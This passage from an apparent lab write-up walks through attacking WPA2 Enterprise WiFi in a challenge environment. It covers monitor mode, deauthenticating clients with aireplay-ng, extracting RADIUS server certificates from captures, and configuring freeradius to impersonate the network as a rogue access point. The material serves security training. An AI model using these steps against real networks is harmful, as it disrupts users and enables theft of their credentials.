</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="7b293e85-a7d5-40be-a164-493b5b4e15ac" class="code"><code class="language-Bash">tls.handshake.certificate</code></pre><p id="4399634c-dd3a-45ec-98d4-f42e8ca3ab21" class="">
</p><figure id="6c38976e-4858-4625-9bab-37ef22ea8c21" class="image"><a href="Untitled%204.png"><img style="width:1823px" src="Untitled%204.png"/></a></figure><p id="8ac88771-1eeb-474c-9db7-95f38eb3c10d" class="">
</p><p id="54c41a56-e425-4104-af0d-48be0f169b79" class="">Open the following headers.</p><p id="b8818982-82b9-4a6c-b845-4a77e75a1698" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="619a6338-a8e8-4c20-8a5e-d6e3b0470dda" class="code"><code class="language-Bash">=&gt; `Extensible Authentication Protocol`
==&gt; `Tansport Laer Security`
====&gt; `TLSv1.2 Record Layer: Handshake Protocol: Certificate`
========&gt;`Handshake Protocol: Certificate`
============&gt;`Certificates`</code></pre><p id="5f76734b-6caf-46ec-822d-defc4e8518df" class="">
</p><p id="241101ec-0d78-44da-8d4c-d97480e61633" class="">For each certificate:</p><ul id="65c20784-3ddc-41df-9317-0f074205004a" class="bulleted-list"><li style="list-style-type:disc">Right click on it with the mouse</li></ul><ul id="77226f4d-4ad0-4667-8a8b-146c8f06735a" class="bulleted-list"><li style="list-style-type:disc">Export Packet Bytes</li></ul><ul id="db95adb6-22bb-4e67-ad5c-7228382f56c2" class="bulleted-list"><li style="list-style-type:disc">Save as cert.der</li></ul><p id="e974b210-f503-46c6-93a3-40477a32507d" class="">
</p><p id="53ff2e77-aaba-4aaa-9cb7-cdb2a3c792db" class=""><strong>Alternative with tshark</strong></p><p id="6f7f6610-4d5b-4155-b641-71d97e8affa9" class="">We can use tshark to do the same as within Wireshark.</p><p id="c6c27bce-cb31-4fbd-9a76-d59e4df0e95d" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="0290d292-a30c-4f1d-b96c-b4687490732d" class="code"><code class="language-Bash">tshark -r wifi-regional-01.cap -Y &quot;ssl.handshake.certificate and eapol&quot; -T fields -e &quot;tls.handshake.certificate&quot; |sed &quot;s/://g&quot; | xxd -ps -r | tee $(mktemp $tmpbase.cert.XXXX.der) | openssl x509 -inform der -text</code></pre><p id="240050fd-3f6b-4e05-b648-2f424e7985a0" class="">
</p><figure id="4ee94e36-5978-4ad2-81ac-c12532f0aab4" class="image"><a href="Untitled%205.png"><img style="width:1833px" src="Untitled%205.png"/></a></figure><p id="1eb590e0-5c4e-49c2-aee2-7cdc5398a633" class="">
</p><p id="92e1f229-0d55-496a-89a2-9f9d2e58f06d" class=""><strong>Install freeradius and mousepad</strong></p><p id="10e30cfb-e73a-4b48-9df9-343d106385bb" class="">Before hacking the WPA2 Enterprise we should install some additional tools what we should use. There are other tools on this machine available, but I prefer these for this exercise. First we should gain some additional privileges to install them.</p><p id="53ddbd3c-cef1-4cc7-ad9f-5ce289af72d1" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="ff4e56bf-99d5-4e11-a830-ee3d6218186c" class="code"><code class="language-Bash">user@WiFiChallengeLab:~$ sudo su</code></pre><p id="cf528b44-2ac6-4b52-9abc-590eafe8580d" class="">
</p><p id="f23878ac-f1b3-4572-bada-861a34377a13" class="">Next we should move the working directory to the home directory of the root.</p><p id="26957077-4c91-4985-94a2-754ccdfbac7e" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="dcad39da-3119-4d8f-95d5-93641d24e955" class="code"><code class="language-Bash">root@WiFiChallengeLab:/home/user# cd ~</code></pre><p id="ca8aa109-4b61-44c8-ada8-ea3e78ae382c" class="">
</p><p id="77f9f65c-693f-4ac0-9a57-90773d7eb1c2" class="">Now we can install freeradius.</p><p id="2f5ffc8f-1572-4067-a1b9-f97c0aea48dd" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="24f62dd4-6735-445d-868c-e652b6efc6c6" class="code"><code class="language-Bash">root@WiFiChallengeLab:~# apt install freeradius -y</code></pre><p id="28c196a1-9191-45b9-9ae9-f074974eb65e" class="">
</p><p id="573c1d07-9c41-4eb8-aaa5-4e220f50c5cb" class="">And let’s install mousepad as well. Normally I would prefer Visual Code, but for this exercise this will be good enough.</p><p id="686e909c-db72-4f77-abcf-f24cefb27ad4" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="c7590259-f2ab-4829-92c5-0c5c87d39ce4" class="code"><code class="language-Bash">root@WiFiChallengeLab:~# apt install mousepad -y</code></pre><p id="9ab8742b-57f5-4de2-8b64-55355324b26c" class="">
</p><p id="967887a2-d4f1-4c96-8117-6c5cbc2ba995" class=""><strong>Monitor mode</strong></p><p id="fd0b3a8c-8307-4604-8417-a2fe4a1967aa" class="">As mentioned in another post I love to work with several terminals open. In this case I start the first terminal and rename it to <strong>Terminal 1 - Monitor</strong>. Next we have to kill the processes running on the system.</p><p id="b29b7e7f-2190-41b7-93b5-d4df5479dfea" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="e6d2a3f7-b25f-4da2-82ca-cfd4235fccdf" class="code"><code class="language-Bash">sudo airmon-ng check kill</code></pre><p id="e2c5adc0-c2ce-41f7-9591-1dc2355b4ea7" class="">
</p><p id="a79a7b1b-cc83-4c41-b713-ae959f871c49" class="">Now we should put the interface to monitor mode.</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="8ef5329a-e299-4d58-926b-a7dc782cb74d" class="code"><code class="language-Bash">sudo airmon-ng start wlan0</code></pre><p id="0ec8a38f-6209-4669-9931-b25ccb34ccba" class="">
</p><p id="1b801886-2bb3-49af-b56e-4aae252fc4fb" class=""><strong>Scan for WiFi networks focus on MGT</strong></p><p id="2fabc121-89a0-4458-b8e4-7beacb41feda" class="">A new terminal is opened by my and renamed to <strong>Terminal 2 - Scanning</strong>. In this terminal we have to identify our target network with the following command.</p><p id="53d0600c-a1ca-4199-9ec6-b464183df2b8" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="00f536ad-ba2c-4109-a563-f6cf47faec7e" class="code"><code class="language-Bash">sudo airodump-ng wlan0mon --band abg</code></pre><p id="43efeab2-ef09-4347-966d-b0758587cbdf" class="">
</p><p id="462301fd-7adf-44ad-a854-3b385e218181" class="">We should take notes of:</p><ul id="7eccbbdf-f2b9-4b59-9085-2bd9cdee95c3" class="bulleted-list"><li style="list-style-type:disc">ESSID</li></ul><ul id="6fda1bb0-7673-4ba3-9b94-369ca355fd7c" class="bulleted-list"><li style="list-style-type:disc">Channel</li></ul><ul id="9492a4fc-11c1-4474-92af-c54aae7cad7f" class="bulleted-list"><li style="list-style-type:disc">BSSID = MAC Address of AP</li></ul><ul id="a2793548-079d-4670-bceb-9b497b72a9f8" class="bulleted-list"><li style="list-style-type:disc">AUTH should be MGT =&gt; WPA Enterprise</li></ul><ul id="43bca965-692e-4679-850c-277eb737449e" class="bulleted-list"><li style="list-style-type:disc">STATION = MAC Address of client</li></ul><p id="b6b60444-9113-462f-b342-b96ea23e49eb" class="">
</p><p id="a31af4bc-0606-41b3-a3fd-37f5e6bb34cb" class=""><strong>Capture data for handshake and certificate</strong></p><p id="32b6acbd-444c-4678-b3e2-9eb93cb2c5a9" class="">Next we should collect some data for the certificates. To do this I start a new terminal and rename it to: <strong>Terminal 3 - Capture</strong>. Now can start a capture on channel 44 for the target network to capture the certificates.</p><p id="fa137cf2-9308-45c7-b48d-3b38df1cc2a8" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="79cc5675-79e3-4013-b0bc-0cea9d6f13fd" class="code"><code class="language-Bash">sudo airodump-ng wlan0mon --band abg -c 44 -w wifi-corp</code></pre><p id="2678e9d2-0be5-4e79-846e-27820aa04ed7" class="">
</p><p id="972bd0de-eb00-478c-8b09-ccb8d6be5945" class="">Then we can open a new terminal and rename it to <strong>Terminal 4 - Deauthenticate</strong>. This terminal will be used to deauthenticate a client. Every time a client will connect a certificate will be sent. To deauthenticate workstations we can use the following command.</p><p id="271b8f01-1851-4834-8361-56c963c75e2e" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="7dbb717c-1224-49a7-9a26-7d2f9ba6cb36" class="code"><code class="language-Bash">sudo aireplay-ng -0 1 -a &lt;MAC-AP&gt; -c &lt;MAC-CLIENT&gt; wlan0mon</code></pre><p id="72bb3355-6d4b-4d35-ad17-6d059910a346" class="">
</p><p id="a563f7a5-7c35-4dfb-a292-47b2a81b8482" class="">If airodump has identified a WPA handshake, we should stop recording data. Then in <strong>Terminal 1 - Monitor</strong> we should disable monitor mode.</p><p id="3be49e04-bb3f-42e9-8f6d-5792f3d3a2e5" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="63146fd4-4d16-4cf0-9b8e-0fa6ca0d10cd" class="code"><code class="language-Bash">sudo airmon-ng stop wlan0mon</code></pre><p id="df7ae3c3-2e47-4cd3-bfce-64098606a0df" class="">
</p><p id="c0add406-17a7-4e0d-aa6f-3a975e151948" class=""><strong>Export certificate from Wireshark</strong></p><p id="5d8dcaff-8941-4987-8cef-37f428c0ec77" class="">
</p><p id="cc13c44f-05e5-4314-b911-18d518998155" class="">Since we have captured everything we need we can export the certificates to create our own Rogue Access Point. Open Wireshark to get the certificate(s).</p><p id="b952878d-cc78-4f27-a09d-8c214b9e8c21" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="0baeaf01-261d-439d-a65b-82026858e2de" class="code"><code class="language-Bash">sudo wireshark wifi-corp.cap</code></pre><p id="82d80f3e-54f0-43a7-92d9-67167a0d0afc" class="">
</p><p id="0ca2cf86-5b36-4843-a03f-3368bfeb2f60" class="">Now we should use one of the filters (what we used in previous challenge as well).</p><p id="a0fbb2b4-e84f-416a-aaad-a7c3f224c6b4" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="c6849733-d0ea-49c1-a95a-139504e5b195" class="code"><code class="language-Bash">wlan.bssid==&lt;MAC-address-AP&gt; &amp;&amp; eap &amp;&amp; tls.handshake.certificate</code></pre><p id="59fd50e0-dd59-4f90-a9e4-c4e25504d9e5" class="">
</p><p id="9b9ef262-3023-4802-a2a4-8d27b055bab6" class="">Or simply filter every certificate.</p><p id="3ed9f2d4-9019-48ea-9cac-e6c75009c880" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="2422f132-8f64-47ab-a07b-484dcd99bd65" class="code"><code class="language-Bash">tls.handshake.certificate</code></pre><p id="86210d52-2411-4049-a2ac-c7f081759888" class="">
</p><p id="92b4d41e-4454-4f64-926c-dabdf26a108d" class="">Open the following headers.</p><p id="6d31cffb-52f3-4a33-bbda-d90b6ecf58f9" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="e1e1eafa-3056-4e69-a236-5eb4363db5dc" class="code"><code class="language-Bash">=&gt; `Extensible Authentication Protocol`
==&gt; `Tansport Laer Security`
====&gt; `TLSv1.2 Record Layer: Handshake Protocol: Certificate`
========&gt;`Handshake Protocol: Certificate`
============&gt;`Certificates`</code></pre><p id="2509210b-d117-471d-b47e-8ec539220a43" class="">
</p><p id="b73d3817-fa1f-4221-ba98-706d567d7e02" class="">For each certificate:</p><ul id="66748888-ff34-46a9-b369-6b9189674d23" class="bulleted-list"><li style="list-style-type:disc">Right click on it with the mouse</li></ul><ul id="6c590482-c50f-41be-8462-67a7b2711cc0" class="bulleted-list"><li style="list-style-type:disc">Export Packet Bytes</li></ul><ul id="69bf616d-bd74-4bef-9581-0e3899c549de" class="bulleted-list"><li style="list-style-type:disc">Save as cert.der</li></ul><p id="00390a85-b632-4d18-b68b-75fefea44f9d" class="">Since we have exported the certificate(s) we can gather the data for our own certificates.</p><p id="f27ecc0e-883c-4dd3-9167-364fa548137a" class="">
</p><p id="7c47c3d9-261b-4dba-8ded-9068b2c8a330" class=""><strong>Gather data for certificate and configure rogue AP</strong></p><p id="4a392dde-d675-4f89-8aa2-207021665c89" class="">
</p><p id="ad6fa865-c8a1-4481-84b9-321f7b71ae19" class="">For this I create a new terminal and rename it to <strong>Terminal 5 - Certificate</strong>. Next we want to gather some information from the certificate so we create our own. We run the openssl command to display the content as text on screen.</p><p id="afc8c45a-049e-47dc-bb54-1d3d4bde05f2" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="15aff49e-c76d-4619-9ce7-b74f23bb7152" class="code"><code class="language-Bash">openssl x509 -inform der -in cert.der -outform pem -out output.crt</code></pre><p id="8c0912dc-6957-40da-bdfc-5799ae05a30d" class="">
</p><p id="d7b8e0d0-fda1-4561-a66a-34f79636943e" class="">I open a sixth terminal window and rename it to <strong>Terminal 6 - Configuration files</strong>. I like to work with multiple terminals so that I can repeat my commands in the other terminals or search for something without having to scroll. We should change the <code>ca.cnf</code> configuration file for our Rogue Access Point.</p><p id="1429b104-0535-427f-bd0b-ee3a00e596d7" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="d79ef42d-d71c-4f6d-95db-d272e9f3162a" class="code"><code class="language-Bash">sudo mousepad /etc/freeradius/3.0/certs/ca.cnf</code></pre><p id="521a4462-d39e-41d5-bd0b-b5788d7c1f05" class="">
</p><p id="acd8e6ef-7ee2-4f8b-a6d3-4d8dbb98f2c1" class="">Adjust the content in the header <code>[certificate_authorirty]</code>.</p><p id="aef8b357-85ad-40f9-a1f9-c48ecd06b430" class="">
</p><figure id="1aceaed0-f494-4ec9-9d9b-81da0a879bfc" class="image"><a href="Untitled%206.png"><img style="width:1572px" src="Untitled%206.png"/></a></figure><p id="2e187683-b7e7-4cd9-b2b3-64d87643c068" class="">
</p><p id="23f528a8-ec1c-441c-aba4-0e45010c4f8b" class="">We should change the <code>server.cnf</code> configuration file for our Rogue Access Point.</p><p id="0af50809-87e1-49aa-ab91-bf8124f9f389" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="136a57fd-e0d4-439e-8e84-916ab6b55afb" class="code"><code class="language-Bash">sudo mousepad /etc/freeradius/3.0/certs/server.cnf</code></pre><p id="d4732603-80c9-4954-af86-79ec4cafff24" class="">
</p><p id="0c06e825-4fe4-4dd3-abda-dffac48fa5ec" class="">Adjust the content in the header <code>[server]</code></p><p id="2b7f7bdb-23e0-499d-a31a-663654a5f6ca" class="">
</p><figure id="e48f01eb-54ae-42c4-825d-b1d786fe0012" class="image"><a href="Untitled%207.png"><img style="width:1578px" src="Untitled%207.png"/></a></figure><p id="4a985a79-fb2d-4e3a-90ea-ff5fa30f3db6" class="">
</p><p id="b070e77e-289c-4956-bd9c-563225b8dbd6" class="">After saving the configuration files we should build the certificates for our Rogue Access Point.</p><h3 id="e35692b7-61e8-467e-8126-f6e64b36fce1" class="">Build the certificates</h3><p id="097f7ef0-a6ff-499e-9d74-759509cb7f9d" class="">Another terminal is opened and renamed to <strong>Terminal 7 - Build certificates</strong>. To regenerate Diffie Hellman key we need some root privileges.</p><p id="a6cde9c1-89c7-4fdd-8394-ed4ddb54cf91" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="6ab04c32-9899-4bd2-af85-aa38e1e014c6" class="code"><code class="language-Bash">sudo -s</code></pre><p id="593887fa-278d-46e8-a1f0-62dbfb3ebca0" class="">
</p><p id="77b81526-bcde-4e3d-a30f-da01da6aa2b2" class="">Next we should change the working directory.</p><p id="cc29688f-e8fa-4cb1-9009-52e707bc8c04" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="5b29e181-039a-4b0f-837e-cd4cc8fbbef2" class="code"><code class="language-Bash">cd /etc/freeradius/3.0/certs</code></pre><p id="562e6b5f-6efe-40ba-9153-4456e83b14e3" class="">
</p><p id="c26a2802-189c-41ef-940c-39535033aae8" class="">Now we should remove and make the certificates.</p><p id="a555d0ba-3170-4ed0-b292-e4b225e79350" class="">
